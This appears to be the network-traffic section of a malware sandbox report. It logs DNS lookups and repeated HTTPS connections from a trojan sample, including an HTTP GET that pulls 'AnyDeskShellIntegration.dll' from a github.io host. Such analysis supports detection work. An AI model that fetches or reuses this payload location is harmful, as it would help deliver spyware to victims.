Sep 29, 2024 02:26:10.298341036 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.298350096 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.298396111 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.376776934 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.376789093 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.376852036 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.376996994 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.376996994 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.377027988 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.377090931 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.378144979 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.378160000 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.378230095 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.378245115 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.378292084 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.382594109 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.382608891 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.382682085 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.382699966 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.382746935 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.383832932 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.383848906 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.383909941 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.383923054 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.383966923 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.463712931 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.463732004 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.463960886 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.463990927 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464050055 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.464171886 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464190960 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464255095 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.464262009 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464312077 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.464752913 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464812994 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464823961 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.464838982 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464852095 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.464884043 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.464907885 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.465279102 CEST  49715  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.465295076 CEST  443    49715  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.489310980 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.489370108 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.489449978 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.489762068 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.489775896 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.964879036 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.964953899 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.965332985 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.965342999 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:10.965507984 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:10.965512991 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.082636118 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.082736015 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.082751036 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.082804918 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.082822084 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.082870960 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.082916021 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.083070993 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.083127022 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.083132982 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.083314896 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.083408117 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.083583117 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.083648920 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.083655119 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.087342024 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.087347031 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.087388039 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.087882042 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.087944984 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.087964058 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.091324091 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.169197083 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169280052 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169322014 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169357061 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169420004 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169461966 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169539928 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.169539928 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.169573069 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.169606924 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.169626951 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.169949055 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170139074 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170188904 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170203924 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170209885 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170241117 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170253038 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170260906 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170264959 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170305014 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170766115 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170838118 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170871973 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170900106 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170905113 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170923948 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170934916 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170950890 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.170954943 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.170984983 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.171015024 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.171648979 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.171703100 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.171735048 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.171761990 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.171765089 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.171775103 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.171796083 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.171814919 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.171819925 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.171864986 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.256181002 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.256376982 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.256470919 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.256616116 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.256618977 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.256619930 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.259339094 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.259470940 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.259494066 CEST  443    49717  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:11.259504080 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:11.260814905 CEST  49717  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:17.099018097 CEST  49721  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:17.099071980 CEST  443    49721  185.199.110.153  192.168.2.6
Sep 29, 2024 02:26:17.099226952 CEST  49721  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:17.099500895 CEST  49721  443    192.168.2.6      185.199.110.153
Sep 29, 2024 02:26:17.099514961 CEST  443    49721  185.199.110.153  192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.569319010 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.569381952 CEST49721443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:17.570040941 CEST49721443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:17.570040941 CEST49721443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:17.570046902 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.570060015 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.685416937 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.685491085 CEST49721443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:17.685509920 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.685523033 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:17.685589075 CEST49721443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:17.686867952 CEST49721443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:17.686885118 CEST44349721185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.161473036 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.161525965 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.161597967 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.165496111 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.165513039 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.619920015 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.620038033 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.620462894 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.620474100 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.620646954 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.620651007 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.719095945 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.719223022 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.719300032 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.719357014 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.719366074 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:24.719424009 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.720098972 CEST49724443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:24.720130920 CEST44349724185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:30.536278009 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:30.536328077 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:30.536403894 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:30.536658049 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:30.536672115 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.113982916 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.114054918 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.114499092 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.114510059 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.114675045 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.114681005 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.217109919 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.217236996 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.217257977 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.217299938 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.217308044 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.217344999 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.217382908 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:31.217430115 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.218388081 CEST49725443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:31.218405962 CEST44349725185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.075207949 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.075262070 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.075336933 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.075711966 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.075726032 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.573999882 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.574131012 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.574620008 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.574630022 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.574810982 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.574816942 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.673399925 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.673460960 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.673491001 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.673532009 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.673552036 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.673564911 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:37.673593998 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.673616886 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.674546957 CEST49726443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:37.674562931 CEST44349726185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.442943096 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.443001986 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.443130970 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.443391085 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.443408012 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.901525974 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.901674032 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.902221918 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.902236938 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:43.902412891 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:43.902426004 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.000750065 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.000848055 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.000916958 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.000973940 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.000988007 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.001045942 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:44.001101017 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.001987934 CEST49728443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:44.002006054 CEST44349728185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:49.817707062 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:49.817747116 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:49.817854881 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:49.818120956 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:49.818136930 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.449127913 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.449269056 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.449767113 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.449771881 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.449933052 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.449939013 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547455072 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547523975 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.547534943 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547549963 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:50.547585011 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.547585011 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.548408985 CEST49729443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:50.548423052 CEST44349729185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:55.942842960 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:55.942904949 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:55.943015099 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:55.943372011 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:55.943398952 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.409133911 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.409252882 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.409719944 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.409730911 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.409945965 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.409951925 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.517827034 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.517944098 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.517949104 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:26:56.517999887 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.518860102 CEST49731443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:26:56.518882990 CEST44349731185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:01.942675114 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:01.942714930 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:01.942791939 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:01.943005085 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:01.943017006 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.399147987 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.399270058 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.399781942 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.399791956 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.399993896 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.399998903 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.499573946 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.499679089 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.499731064 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.499799013 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.499958992 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.500005960 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.500006914 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:02.500052929 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.500802994 CEST49733443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:02.500818968 CEST44349733185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:07.895812035 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:07.895853043 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:07.898472071 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:07.898745060 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:07.898756027 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.360970974 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.361155033 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.362184048 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.362190962 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.362425089 CEST49734443192.168.2.6185.199.110.153
                                                                                                    Sep 29, 2024 02:27:08.362430096 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.462281942 CEST44349734185.199.110.153192.168.2.6
                                                                                                    Sep 29, 2024 02:27:08.462372065 CEST49734443192.168.2.6185.199.110.153
UDP Packets

Timestamp                            | Source Port | Dest Port | Source IP   | Dest IP
Sep 29, 2024 02:26:00.380841970 CEST | 51680       | 53        | 192.168.2.6 | 1.1.1.1
Sep 29, 2024 02:26:00.389503956 CEST | 53          | 51680     | 1.1.1.1     | 192.168.2.6
DNS Queries

Timestamp                            | Source IP   | Dest IP | Trans ID | OP Code            | Name                | Type           | Class       | DNS over HTTPS
Sep 29, 2024 02:26:00.380841970 CEST | 192.168.2.6 | 1.1.1.1 | 0xd606   | Standard query (0) | duy-thanh.github.io | A (IP address) | IN (0x0001) | false
DNS Answers

Timestamp                            | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName | Address         | Type           | Class       | DNS over HTTPS
Sep 29, 2024 02:26:00.389503956 CEST | 1.1.1.1   | 192.168.2.6 | 0xd606   | No error (0) | duy-thanh.github.io |       | 185.199.110.153 | A (IP address) | IN (0x0001) | false
Sep 29, 2024 02:26:00.389503956 CEST | 1.1.1.1   | 192.168.2.6 | 0xd606   | No error (0) | duy-thanh.github.io |       | 185.199.111.153 | A (IP address) | IN (0x0001) | false
Sep 29, 2024 02:26:00.389503956 CEST | 1.1.1.1   | 192.168.2.6 | 0xd606   | No error (0) | duy-thanh.github.io |       | 185.199.109.153 | A (IP address) | IN (0x0001) | false
Sep 29, 2024 02:26:00.389503956 CEST | 1.1.1.1   | 192.168.2.6 | 0xd606   | No error (0) | duy-thanh.github.io |       | 185.199.108.153 | A (IP address) | IN (0x0001) | false
                                                                                                    • duy-thanh.github.io
Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
0          | 192.168.2.6 | 49710       | 185.199.110.153 | 443              | 2404 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
Timestamp               | Bytes transferred | Direction | Data
2024-09-29 00:26:00 UTC | 77                | OUT       | GET /file/AnyDeskShellIntegration.dll HTTP/1.1
Host: duy-thanh.github.io
2024-09-29 00:26:01 UTC | 757               | IN        | HTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 54784
